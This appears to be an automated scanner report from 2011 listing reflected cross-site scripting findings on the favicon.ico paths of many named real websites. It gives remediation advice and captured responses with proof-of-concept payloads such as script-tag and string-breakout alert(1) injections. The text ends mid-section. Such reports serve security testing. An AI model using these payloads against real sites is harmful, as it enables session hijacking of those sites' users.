Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc7e6"-alert(1)-"cb2ddf1c526 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <!--// ref:null--> <title>4shared.co ...[SNIP]... <script type="text/javascript"> function reportAbuse() { var windowname="abuse"; var url="/abuse.jsp?aLink=http://www.4shared.com/favicon.icofc7e6"-alert(1)-"cb2ddf1c526"; OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50'); OpenWindow.focus(); } function feedback() { var wind ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb4c9'-alert(1)-'fcf1ddfae63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 617ce"><script>alert(1)</script>5721ca53270 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f9ff1<script>alert(1)</script>2128e304c54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4666b"><script>alert(1)</script>4f3eee2b900 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 39150'><script>alert(1)</script>bb8f65a6a8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79e5d"><a>a582c202136 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d6db6<script>alert(1)</script>76020ab0f37 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 95434%20style%3dx%3aexpression(alert(1))%206530d067f4a was submitted in the REST URL parameter 1. This input was echoed as 95434 style=x:expression(alert(1)) 6530d067f4a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24317"><script>alert(1)</script>121a4b3f1d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9e862--><script>alert(1)</script>d9a6c1b138b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71013"><script>alert(1)</script>5a152d520dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b2e2"><script>alert(1)</script>5d9dc54262b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Thu, 31 Mar 2011 21:19:14 GMT Server: Set-Cookie: session_id=ad88f0a6310c49a4fed5c4f4ab60d3e9; path=/; domain=.bleepingcomputer.com; httponly Vary: Accept-Encoding Content-Type: text/html Content-Length: 24835
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Bleeping Computer - Computer Help and Discussion</title> <meta name="Description" content="A free web based commun ...[SNIP]... <form action="http://www.bleepingcomputer.com/forums/index.php?app=core&module=global&section=login&do=process&return=http://www.bleepingcomputer.com/favicon.ico5b2e2"><script>alert(1)</script>5d9dc54262b" method="post"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f32fc'><script>alert(1)</script>bba725bdb52 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Thu, 31 Mar 2011 21:19:14 GMT Server: Set-Cookie: session_id=7a5bbe88b5e7a2147978182e0a1c3ec1; path=/; domain=.bleepingcomputer.com; httponly Vary: Accept-Encoding Content-Type: text/html Content-Length: 24835
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Bleeping Computer - Computer Help and Discussion</title> <meta name="Description" content="A free web based commun ...[SNIP]... <a href='http://www.bleepingcomputer.com/forums/index.php?app=core&module=global&section=login&return=http://www.bleepingcomputer.com/favicon.icof32fc'><script>alert(1)</script>bba725bdb52'> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9e65"><script>alert(1)</script>620768afb08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a4b9'-alert(1)-'d0f76f80b1c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e7d1"><script>alert(1)</script>0f5d76ea955 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Thu, 31 Mar 2011 20:27:09 GMT Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 X-Cache: MISS from www.booking.com Content-Length: 38532
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload b16ef</title><script>alert(1)</script>7bedde40a4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 48aa3<script>alert(1)</script>bead1ad8bed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39f27'%3balert(1)//896becadf55 was submitted in the REST URL parameter 1. This input was echoed as 39f27';alert(1)//896becadf55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27992<script>alert(1)</script>3ee2a973ae2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Thu, 31 Mar 2011 22:04:04 GMT Server: Apache Content-Length: 2486 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 - Page Not Found</title> <style type="text/css"> body { background-color: #F2EFE8; font-family: verdana, sans-serif ...[SNIP]... <strong>http://www.calorie-count.com/favicon.ico27992<script>alert(1)</script>3ee2a973ae2</strong> ...[SNIP]...
1.22. http://www.calorie-count.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.calorie-count.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 723b2<script>alert(1)</script>9675ca470f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Thu, 31 Mar 2011 22:04:04 GMT Server: Apache Content-Length: 2489 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>404 - Page Not Found</title> <style type="text/css"> body { background-color: #F2EFE8; font-family: verdana, sans-serif ...[SNIP]... <strong>http://www.calorie-count.com/favicon.ico?723b2<script>alert(1)</script>9675ca470f6=1</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1900"><script>alert(1)</script>2b16e35a3d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Thu, 31 Mar 2011 20:24:11 GMT Server: Apache Set-Cookie: lang=en; path=/ Cache-Control: max-age=0 Expires: Thu, 31 Mar 2011 20:24:11 GMT Content-Type: text/html;charset=utf-8 Content-Length: 9848
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>The Page You Requested Was N ...[SNIP]... <a href="/favicon.icoa1900"><script>alert(1)</script>2b16e35a3d2/es"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7166d<script>alert(1)</script>6e81a71c694 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 770aa<script>alert(1)</script>5b41d12322e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2467"><script>alert(1)</script>d749514c894 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1890"><a>449e9cf15fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a568d<script>alert(1)</script>6602233ab9f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a53bb'-alert(1)-'6c32132cf1e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into an HTML comment. The payload 52dde--><a>6f9f1e27a7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 404 Not Found Server: Apache/2 Status: 404 Not Found Expires: Thu, 31 Mar 2011 21:05:09 GMT Cache-Control: public, max-age=300 Vary: Accept-Encoding X-Served-By: app1v-fe.sb.lax1 Content-Type: text/html; charset=UTF-8 Content-Length: 56219 Date: Thu, 31 Mar 2011 21:00:10 GMT X-Varnish: 1145605573 Age: 0 Via: 1.1 varnish Connection: keep-alive X-Cache: MISS from pxy2v.sb.lax1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <!-- page created on - 02-23-11, 18:23:08 --> <!-- $Id: pagegen.php 2816 2009-06-25 1 ...[SNIP]... <!-- BEGIN GN Ad Tag for Craveonline 1000x1000 favicon.ico52dde--><a>6f9f1e27a7d --> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79676"-alert(1)-"1eb60a3090f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72686"><a>058f96401a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 829b3<a>3c43004e9c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c349'-alert(1)-'7f4d161b00a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9f73f<a>07b3868c9eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: PHP/5.2.6 Expires: Thu, 31 Mar 2011 21:24:53 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html; charset=utf-8 Date: Thu, 31 Mar 2011 20:24:53 GMT Content-Length: 11939 Connection: close Set-Cookie: dtsession=94e5b3b9ef0dc69878440525a651c731; expires=Sun, 28 Mar 2021 20:24:53 GMT; path=/; domain=.domaintools.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html> <head> <title>DomainTools: Page Not Found</title> <link rel="alternate" type="application/ ...[SNIP]... <a>07b3868c9eb">Whois record for "9f73f<a>07b3868c9eb"</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 539a1"-alert(1)-"e7f74d1630a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeee8<script>alert(1)</script>c6239eb935 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b06a3"><script>alert(1)</script>1184b6c85af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>403 - Access Denied</title>
...[SNIP]... <a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.ecnext.com/favicon.icob06a3"><script>alert(1)</script>1184b6c85af at Thu Mar 31 17:04:24 2011 from 173.193.214.243"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fb61f<script>alert(1)</script>d290fbfbec1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>403 - Access Denied</title>
...[SNIP]... <br> Access Denied: http://www.ecnext.com/favicon.icofb61f<script>alert(1)</script>d290fbfbec1 at Thu Mar 31 17:04:24 2011 from 173.193.214.243<br> ...[SNIP]...
1.40. http://www.ecnext.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ecnext.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f6be0<script>alert(1)</script>eda0e6a2db0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>403 - Access Denied</title>
...[SNIP]... <br> Access Denied: http://www.ecnext.com/favicon.ico?f6be0<script>alert(1)</script>eda0e6a2db0=1 at Thu Mar 31 17:04:23 2011 from 173.193.214.243<br> ...[SNIP]...
1.41. http://www.ecnext.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ecnext.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52049"><script>alert(1)</script>dba38377c16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>403 - Access Denied</title>
...[SNIP]... <a href="mailto:webmaster@ecnext.com?subject=403 error&body=Access Denied: http://www.ecnext.com/favicon.ico?52049"><script>alert(1)</script>dba38377c16=1 at Thu Mar 31 17:04:23 2011 from 173.193.214.243"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68ef7"%3b39b7c30645e was submitted in the REST URL parameter 1. This input was echoed as 68ef7";39b7c30645e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13ad0"><a>00913a37cfb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 58588<script>alert(1)</script>fbf14ed29b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Thu, 31 Mar 2011 20:23:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 125622
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <p>The page you are looking for: "http://www.egotastic.com/favicon.ico58588<script>alert(1)</script>fbf14ed29b2" seems to be missing.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e21c8<script>alert(1)</script>31495f85061 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 800fa<script>alert(1)</script>f2eb3a906fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<html> <head> <title>/favicon.ico800fa<script>alert(1)</script>f2eb3a906fd not found on elyricsworld.com</title> <meta name="robots" content="noindex"> <style type="text/css"> body { fo ...[SNIP]... <h1>/favicon.ico800fa<script>alert(1)</script>f2eb3a906fd not found on elyricsworld.com</h1> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 33f72</title><script>alert(1)</script>7bc3345a70f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<html> <head> <title>/favicon.ico33f72</title><script>alert(1)</script>7bc3345a70f not found on elyricsworld.com</title> <meta name="robots" content="noindex"> <style type="text/css"> body { ...[SNIP]...
1.48. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.elyricsworld.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 3fe68</title><script>alert(1)</script>a78f99571dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<html> <head> <title>/favicon.ico?3fe68</title><script>alert(1)</script>a78f99571dc=1 not found on elyricsworld.com</title> <meta name="robots" content="noindex"> <style type="text/css"> body
...[SNIP]...
1.49. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.elyricsworld.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 14dd9<script>alert(1)</script>3e7d9a90ad9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<html> <head> <title>/favicon.ico?14dd9<script>alert(1)</script>3e7d9a90ad9=1 not found on elyricsworld.com</title> <meta name="robots" content="noindex"> <style type="text/css"> body {
...[SNIP]... <h1>/favicon.ico?14dd9<script>alert(1)</script>3e7d9a90ad9=1 not found on elyricsworld.com</h1> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55c96'%3b233a586cfa8 was submitted in the REST URL parameter 1. This input was echoed as 55c96';233a586cfa8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4ee9"><script>alert(1)</script>2114a57d217 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da652"%3bbc4ae8cb999 was submitted in the REST URL parameter 1. This input was echoed as da652";bc4ae8cb999 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 619b3"><script>alert(1)</script>a747a8ea890 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7b92"-alert(1)-"8460d23bac5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
